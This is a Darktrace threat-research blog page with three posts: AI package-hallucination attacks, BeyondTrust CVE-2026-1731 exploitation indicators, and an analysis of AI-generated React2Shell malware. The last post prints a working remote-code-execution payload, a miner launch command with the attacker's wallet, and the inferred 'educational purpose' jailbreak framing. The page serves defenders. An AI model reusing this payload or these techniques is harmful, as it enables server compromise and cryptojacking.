Blog
/
/
October 30, 2023

Exploring AI Threats: Package Hallucination Attacks

Learn how malicious actors exploit errors in generative AI tools to launch packet attacks. Read how Darktrace products detect and prevent these threats!
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Charlotte Thompson
Cyber Analyst
Written by
Tiana Kelly
Deputy Team Lead, London & Cyber Analyst
Default blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog image
30
Oct 2023

AI tools open doors for threat actors

On November 30, 2022, the free conversational language generation model ChatGPT was launched by OpenAI, an artificial intelligence (AI) research and development company. The launch of ChatGPT was the culmination of development ongoing since 2018 and represented the latest innovation in the ongoing generative AI boom and made the use of generative AI tools accessible to the general population for the first time.

ChatGPT is estimated to currently have at least 100 million users, and in August 2023 the site reached 1.43 billion visits [1]. Darktrace data indicated that, as of March 2023, 74% of active customer environments have employees using generative AI tools in the workplace [2].

However, with new tools come new opportunities for threat actors to exploit and use them maliciously, expanding their arsenal.

Much consideration has been given to mitigating the impacts of the increased linguistic complexity in social engineering and phishing attacks resulting from generative AI tool use, with Darktrace observing a 135% increase in ‘novel social engineering attacks’ across thousands of active Darktrace/Email™ customers from January to February 2023, corresponding with the widespread adoption of ChatGPT and its peers [3].

Less overall consideration, however, has been given to impacts stemming from errors intrinsic to generative AI tools. One of these errors is AI hallucinations.

What is an AI hallucination?

AI “hallucination” is a term which refers to the predictive elements of generative AI and LLMs’ AI model gives an unexpected or factually incorrect response which does not align with its machine learning training data [4]. This differs from regular and intended behavior for an AI model, which should provide a response based on the data it was trained upon.  

Why are AI hallucinations a problem?

Despite the term indicating it might be a rare phenomenon, hallucinations are far more likely than accurate or factual results as the AI models used in LLMs are merely predictive and focus on the most probable text or outcome, rather than factual accuracy.

Given the widespread use of generative AI tools in the workplace employees are becoming significantly more likely to encounter an AI hallucination. Furthermore, if these fabricated hallucination responses are taken at face value, they could cause significant issues for an organization.

Use of generative AI in software development

Software developers may use generative AI for recommendations on how to optimize their scripts or code, or to find packages to import into their code for various uses. Software developers may ask LLMs for recommendations on specific pieces of code or how to solve a specific problem, which will likely lead to a third-party package. It is possible that packages recommended by generative AI tools could represent AI hallucinations and the packages may not have been published, or, more accurately, the packages may not have been published prior to the date at which the training data for the model halts. If these hallucinations result in common suggestions of a non-existent package, and the developer copies the code snippet wholesale, this may leave the exchanges vulnerable to attack.

Research conducted by Vulcan revealed the prevalence of AI hallucinations when ChatGPT is asked questions related to coding. After sourcing a sample of commonly asked coding questions from Stack Overflow, a question-and-answer website for programmers, researchers queried ChatGPT (in the context of Node.js and Python) and reviewed its responses. In 20% of the responses provided by ChatGPT pertaining to Node.js at least one un-published package was included, whilst the figure sat at around 35% for Python [4].

Hallucinations can be unpredictable, but would-be attackers are able to find packages to create by asking generative AI tools generic questions and checking whether the suggested packages exist already. As such, attacks using this vector are unlikely to target specific organizations, instead posing more of a widespread threat to users of generative AI tools.

Malicious packages as attack vectors

Although AI hallucinations can be unpredictable, and responses given by generative AI tools may not always be consistent, malicious actors are able to discover AI hallucinations by adopting the approach used by Vulcan. This allows hallucinated packages to be used as attack vectors. Once a malicious actor has discovered a hallucination of an un-published package, they are able to create a package with the same name and include a malicious payload, before publishing it. This is known as a malicious package.

Malicious packages could also be recommended by generative AI tools in the form of pre-existing packages. A user may be recommended a package that had previously been confirmed to contain malicious content, or a package that is no longer maintained and, therefore, is more vulnerable to hijack by malicious actors.

In such scenarios it is not necessary to manipulate the training data (data poisoning) to achieve the desired outcome for the malicious actor, thus a complex and time-consuming attack phase can easily be bypassed.

An unsuspecting software developer may incorporate a malicious package into their code, rendering it harmful. Deployment of this code could then result in compromise and escalation into a full-blown cyber-attack.

Figure 1: Flow diagram depicting the initial stages of an AI Package Hallucination Attack.

For providers of Software-as-a-Service (SaaS) products, this attack vector may represent an even greater risk. Such organizations may have a higher proportion of employed software developers than other organizations of comparable size. A threat actor, therefore, could utilize this attack vector as part of a supply chain attack, whereby a malicious payload becomes incorporated into trusted software and is then distributed to multiple customers. This type of attack could have severe consequences including data loss, the downtime of critical systems, and reputational damage.

How could Darktrace detect an AI Package Hallucination Attack?

In June 2023, Darktrace introduced a range of DETECT™ and RESPOND™ models designed to identify the use of generative AI tools within customer environments, and to autonomously perform inhibitive actions in response to such detections. These models will trigger based on connections to endpoints associated with generative AI tools, as such, Darktrace’s detection of an AI Package Hallucination Attack would likely begin with the breaching of one of the following DETECT models:

  • Compliance / Anomalous Upload to Generative AI
  • Compliance / Beaconing to Rare Generative AI and Generative AI
  • Compliance / Generative AI

Should generative AI tool use not be permitted by an organization, the Darktrace RESPOND model ‘Antigena / Network / Compliance / Antigena Generative AI Block’ can be activated to autonomously block connections to endpoints associated with generative AI, thus preventing an AI Package Hallucination attack before it can take hold.

Once a malicious package has been recommended, it may be downloaded from GitHub, a platform and cloud-based service used to store and manage code. Darktrace DETECT is able to identify when a device has performed a download from an open-source repository such as GitHub using the following models:

  • Device / Anomalous GitHub Download
  • Device / Anomalous Script Download Followed By Additional Packages

Whatever goal the malicious package has been designed to fulfil will determine the next stages of the attack. Due to their highly flexible nature, AI package hallucinations could be used as an attack vector to deliver a large variety of different malware types.

As GitHub is a commonly used service by software developers and IT professionals alike, traditional security tools may not alert customer security teams to such GitHub downloads, meaning malicious downloads may go undetected. Darktrace’s anomaly-based approach to threat detection, however, enables it to recognize subtle deviations in a device’s pre-established pattern of life which may be indicative of an emerging attack.

Subsequent anomalous activity representing the possible progression of the kill chain as part of an AI Package Hallucination Attack could then trigger an Enhanced Monitoring model. Enhanced Monitoring models are high-fidelity indicators of potential malicious activity that are investigated by the Darktrace analyst team as part of the Proactive Threat Notification (PTN) service offered by the Darktrace Security Operation Center (SOC).

Conclusion

Employees are often considered the first line of defense in cyber security; this is particularly true in the face of an AI Package Hallucination Attack.

As the use of generative AI becomes more accessible and an increasingly prevalent tool in an attacker’s toolbox, organizations will benefit from implementing company-wide policies to define expectations surrounding the use of such tools. It is simple, yet critical, for example, for employees to fact check responses provided to them by generative AI tools. All packages recommended by generative AI should also be checked by reviewing non-generated data from either external third-party or internal sources. It is also good practice to adopt caution when downloading packages with very few downloads as it could indicate the package is untrustworthy or malicious.

As of September 2023, ChatGPT Plus and Enterprise users were able to use the tool to browse the internet, expanding the data ChatGPT can access beyond the previous training data cut-off of September 2021 [5]. This feature will be expanded to all users soon [6]. ChatGPT providing up-to-date responses could prompt the evolution of this attack vector, allowing attackers to publish malicious packages which could subsequently be recommended by ChatGPT.

It is inevitable that a greater embrace of AI tools in the workplace will be seen in the coming years as the AI technology advances and existing tools become less novel and more familiar. By fighting fire with fire, using AI technology to identify AI usage, Darktrace is uniquely placed to detect and take preventative action against malicious actors capitalizing on the AI boom.

Credit to Charlotte Thompson, Cyber Analyst, Tiana Kelly, Analyst Team Lead, London, Cyber Analyst

References

[1] https://seo.ai/blog/chatgpt-user-statistics-facts

[2] https://darktrace.com/news/darktrace-addresses-generative-ai-concerns

[3] https://darktrace.com/news/darktrace-email-defends-organizations-against-evolving-cyber-threat-landscape

[4] https://vulcan.io/blog/ai-hallucinations-package-risk?nab=1&utm_referrer=https%3A%2F%2Fwww.google.com%2F

[5] https://twitter.com/OpenAI/status/1707077710047216095

[6] https://www.reuters.com/technology/openai-says-chatgpt-can-now-browse-internet-2023-09-27/

Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Charlotte Thompson
Cyber Analyst
Written by
Tiana Kelly
Deputy Team Lead, London & Cyber Analyst

More in this series

No items found.

Blog

/

/

February 13, 2026

CVE-2026-1731: How Darktrace Sees the BeyondTrust Exploitation Wave Unfolding

Default blog imageDefault blog image

Note: Darktrace's Threat Research team is publishing now to help defenders. We will update continue updating this blog as our investigations unfold.

Background

On February 6, 2026, the Identity & Access Management solution BeyondTrust announced patches for a vulnerability, CVE-2026-1731, which enables unauthenticated remote code execution using specially crafted requests.  This vulnerability affects BeyondTrust Remote Support (RS) and particular older versions of Privileged Remote Access (PRA) [1].

A Proof of Concept (PoC) exploit for this vulnerability was released publicly on February 10, and open-source intelligence (OSINT) reported exploitation attempts within 24 hours [2].

Previous intrusions against Beyond Trust technology have been cited as being affiliated with nation-state attacks, including a 2024 breach targeting the U.S. Treasury Department. This incident led to subsequent emergency directives from  the Cybersecurity and Infrastructure Security Agency (CISA) and later showed attackers had chained previously unknown vulnerabilities to achieve their goals [3].

Additionally, there appears to be infrastructure overlap with React2Shell mass exploitation previously observed by Darktrace, with command-and-control (C2) domain  avg.domaininfo[.]top seen in potential post-exploitation activity for BeyondTrust, as well as in a React2Shell exploitation case involving possible EtherRAT deployment.

Darktrace Detections

Darktrace’s Threat Research team has identified highly anomalous activity across several customers that may relate to exploitation of BeyondTrust since February 10, 2026. Observed activities include:

-              Outbound connections and DNS requests for endpoints associated with Out-of-Band Application Security Testing; these services are commonly abused by threat actors for exploit validation.  Associated Darktrace models include:

o    Compromise / Possible Tunnelling to Bin Services

-              Suspicious executable file downloads. Associated Darktrace models include:

o    Anomalous File / EXE from Rare External Location

-              Outbound beaconing to rare domains. Associated Darktrace models include:

o   Compromise / Agent Beacon (Medium Period)

o   Compromise / Agent Beacon (Long Period)

o   Compromise / Sustained TCP Beaconing Activity To Rare Endpoint

o   Compromise / Beacon to Young Endpoint

o   Anomalous Server Activity / Rare External from Server

o   Compromise / SSL Beaconing to Rare Destination

-              Unusual cryptocurrency mining activity. Associated Darktrace models include:

o   Compromise / Monero Mining

o   Compromise / High Priority Crypto Currency Mining

And model alerts for:

o    Compromise / Rare Domain Pointing to Internal IP

IT Defenders: As part of best practices, we highly recommend employing an automated containment solution in your environment. For Darktrace customers, please ensure that Autonomous Response is configured correctly. More guidance regarding this activity and suggested actions can be found in the Darktrace Customer Portal.  

Appendices

Potential indicators of post-exploitation behavior:

·      217.76.57[.]78 – IP address - Likely C2 server

·      hXXp://217.76.57[.]78:8009/index.js - URL -  Likely payload

·      b6a15e1f2f3e1f651a5ad4a18ce39d411d385ac7  - SHA1 - Likely payload

·      195.154.119[.]194 – IP address – Likely C2 server

·      hXXp://195.154.119[.]194/index.js - URL – Likely payload

·      avg.domaininfo[.]top – Hostname – Likely C2 server

·      104.234.174[.]5 – IP address - Possible C2 server

·      35da45aeca4701764eb49185b11ef23432f7162a – SHA1 – Possible payload

·      hXXp://134.122.13[.]34:8979/c - URL – Possible payload

·      134.122.13[.]34 – IP address – Possible C2 server

·      28df16894a6732919c650cc5a3de94e434a81d80 - SHA1 - Possible payload

References:

1.        https://nvd.nist.gov/vuln/detail/CVE-2026-1731

2.        https://www.securityweek.com/beyondtrust-vulnerability-targeted-by-hackers-within-24-hours-of-poc-release/

3.        https://www.rapid7.com/blog/post/etr-cve-2026-1731-critical-unauthenticated-remote-code-execution-rce-beyondtrust-remote-support-rs-privileged-remote-access-pra/

Continue reading
About the author
Emma Foulger
Global Threat Research Operations Lead

Blog

/

Network

/

February 10, 2026

AI/LLM-Generated Malware Used to Exploit React2Shell

AI/LLM-Generated Malware Used to Exploit React2ShellDefault blog imageDefault blog image

Introduction

To observe adversary behavior in real time, Darktrace operates a global honeypot network known as “CloudyPots”, designed to capture malicious activity across a wide range of services, protocols, and cloud platforms. These honeypots provide valuable insights into the techniques, tools, and malware actively targeting internet‑facing infrastructure.

A recently observed intrusion against Darktrace’s Cloudypots environment revealed a fully AI‑generated malware sample exploiting CVE-2025-55182, also known as React2Shell. As AI‑assisted software development (“vibecoding”) becomes more widespread, attackers are increasingly leveraging large language models to rapidly produce functional tooling. This incident illustrates a broader shift: AI is now enabling even low-skill operators to generate effective exploitation frameworks at speed. This blog examines the attack chain, analyzes the AI-generated payload, and outlines what this evolution means for defenders.

Initial access

The intrusion was observed against the Darktrace Docker honeypot, which intentionally exposes the Docker daemon internet-facing with no authentication. This configuration allows any attacker to discover the daemon and create a container via the Docker API.

The attacker was observed spawning a container named “python-metrics-collector”, configured with a start up command that first installed prerequisite tools including curl, wget, and python 3.

Container spawned with the name ‘python-metrics-collector’.
Figure 1: Container spawned with the name ‘python-metrics-collector’.

Subsequently, it will download a list of required python packages from

  • hxxps://pastebin[.]com/raw/Cce6tjHM,

Finally it will download and run a python script from:

  • hxxps://smplu[.]link/dockerzero.

This link redirects to a GitHub Gist hosted by user “hackedyoulol”, who has since been banned from GitHub at time of writing.

  • hxxps://gist.githubusercontent[.]com/hackedyoulol/141b28863cf639c0a0dd563344101f24/raw/07ddc6bb5edac4e9fe5be96e7ab60eda0f9376c3/gistfile1.txt

Notably the script did not contain a docker spreader – unusual for Docker-focused malware – indicating that propagation was likely handled separately from a centralized spreader server.

Deployed components and execution chain

The downloaded Python payload was the central execution component for the intrusion. Obfuscation by design within the sample was reinforced between the exploitation script and any spreading mechanism. Understanding that docker malware samples typically include their own spreader logic, the omission suggests that the attacker maintained and executed a dedicated spreading tool remotely.

The script begins with a multi-line comment:
"""
   Network Scanner with Exploitation Framework
   Educational/Research Purpose Only
   Docker-compatible: No external dependencies except requests
"""

This is very telling, as the overwhelming majority of samples analysed do not feature this level of commentary in files, as they are often designed to be intentionally difficult to understand to hinder analysis. Quick scripts written by human operators generally prioritize speed and functionality over clarity. LLMs on the other hand will document all code with comments very thoroughly by design, a pattern we see repeated throughout the sample.  Further, AI will refuse to generate malware as part of its safeguards.

The presence of the phrase “Educational/Research Purpose Only” additionally suggests that the attacker likely jailbroke an AI model by framing the malicious request as educational.

When portions of the script were tested in AI‑detection software, the output further indicated that the code was likely generated by a large language model.

GPTZero AI-detection results indicating that the script was likely generated using an AI model.
Figure 2: GPTZero AI-detection results indicating that the script was likely generated using an AI model.

The script is a well constructed React2Shell exploitation toolkit, which aims to gain remote code execution and deploy a XMRig (Monero) crypto miner. It uses an IP‑generation loop to identify potential targets and executes a crafted exploitation request containing:

  • A deliberately structured Next.js server component payload
  • A chunk designed to force an exception and reveal command output
  • A child process invocation to run arbitrary shell commands

    def execute_rce_command(base_url, command, timeout=120):  
    """ ACTUAL EXPLOIT METHOD - Next.js React Server Component RCE
    DO NOT MODIFY THIS FUNCTION
    Returns: (success, output)  
    """  
    try: # Disable SSL warnings     urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

 crafted_chunk = {
      "then": "$1:__proto__:then",
      "status": "resolved_model",
      "reason": -1,
      "value": '{"then": "$B0"}',
      "_response": {
          "_prefix": f"var res = process.mainModule.require('child_process').execSync('{command}', {{encoding: 'utf8', maxBuffer: 50 * 1024 * 1024, stdio: ['pipe', 'pipe', 'pipe']}}).toString(); throw Object.assign(new Error('NEXT_REDIRECT'), {{digest:`${{res}}`}});",
          "_formData": {
              "get": "$1:constructor:constructor",
          },
      },
  }

  files = {
      "0": (None, json.dumps(crafted_chunk)),
      "1": (None, '"$@0"'),
  }

  headers = {"Next-Action": "x"}

  res = requests.post(base_url, files=files, headers=headers, timeout=timeout, verify=False)

This function is initially invoked with ‘whoami’ to determine if the host is vulnerable, before using wget to download XMRig from its GitHub repository and invoking it with a configured mining pool and wallet address.

]\

WALLET = "45FizYc8eAcMAQetBjVCyeAs8M2ausJpUMLRGCGgLPEuJohTKeamMk6jVFRpX4x2MXHrJxwFdm3iPDufdSRv2agC5XjykhA"
XMRIG_VERSION = "6.21.0"
POOL_PORT_443 = "pool.supportxmr.com:443"
...
print_colored(f"[EXPLOIT] Starting miner on {identifier} (port 443)...", 'cyan')  
miner_cmd = f"nohup xmrig-{XMRIG_VERSION}/xmrig -o {POOL_PORT_443} -u {WALLET} -p {worker_name} --tls -B >/dev/null 2>&1 &"

success, _ = execute_rce_command(base_url, miner_cmd, timeout=10)

Many attackers do not realise that while Monero uses an opaque blockchain (so transactions cannot be traced and wallet balances cannot be viewed), mining pools such as supportxmr will publish statistics for each wallet address that are publicly available. This makes it trivial to track the success of the campaign and the earnings of the attacker.

 The supportxmr mining pool overview for the attackers wallet address
Figure 3: The supportxmr mining pool overview for the attackers wallet address

Based on this information we can determine the attacker has made approx 0.015 XMR total since the beginning of this campaign, which as of writing is valued at £5. Per day, the attacker is generating 0.004 XMR, which is £1.33 as of writing. The worker count is 91, meaning that 91 hosts have been infected by this sample.

Conclusion

While the amount of money generated by the attacker in this case is relatively low, and cryptomining is far from a new technique, this campaign is proof that AI based LLMs have made cybercrime more accessible than ever. A single prompting session with a model was sufficient for this attacker to generate a functioning exploit framework and compromise more than ninety hosts, demonstrating that the operational value of AI for adversaries should not be underestimated.

CISOs and SOC leaders should treat this event as a preview of the near future. Threat actors can now generate custom malware on demand, modify exploits instantly, and automate every stage of compromise. Defenders must prioritize rapid patching, continuous attack surface monitoring, and behavioral detection approaches. AI‑generated malware is no longer theoretical — it is operational, scalable, and accessible to anyone.

Analyst commentary

It is worth noting that the downloaded script does not appear to include a Docker spreader, meaning the malware will not replicate to other victims from an infected host. This is uncommon for Docker malware, based on other samples analyzed by Darktrace researchers. This indicates that there is a separate script responsible for spreading, likely deployed by the attacker from a central spreader server. This theory is supported by the fact that the IP that initiated the connection, 49[.]36.33.11, is registered to a residential ISP in India. While it is possible the attacker is using a residential proxy server to cover their tracks, it is also plausible that they are running the spreading script from their home computer. However, this should not be taken as confirmed attribution.

Credit to Nathaniel Bill (Malware Research Engineer), Nathaniel Jones ( VP Threat Research | Field CISO AI Security)

Edited by Ryan Traill (Analyst Content Lead)

Indicators of Compromise (IoCs)

Spreader IP - 49[.]36.33.11
Malware host domain - smplu[.]link
Hash - 594ba70692730a7086ca0ce21ef37ebfc0fd1b0920e72ae23eff00935c48f15b
Hash 2 - d57dda6d9f9ab459ef5cc5105551f5c2061979f082e0c662f68e8c4c343d667d

Continue reading
About the author
Nathaniel Bill
Malware Research Engineer
Your data. Our AI.
Elevate your network security with Darktrace AI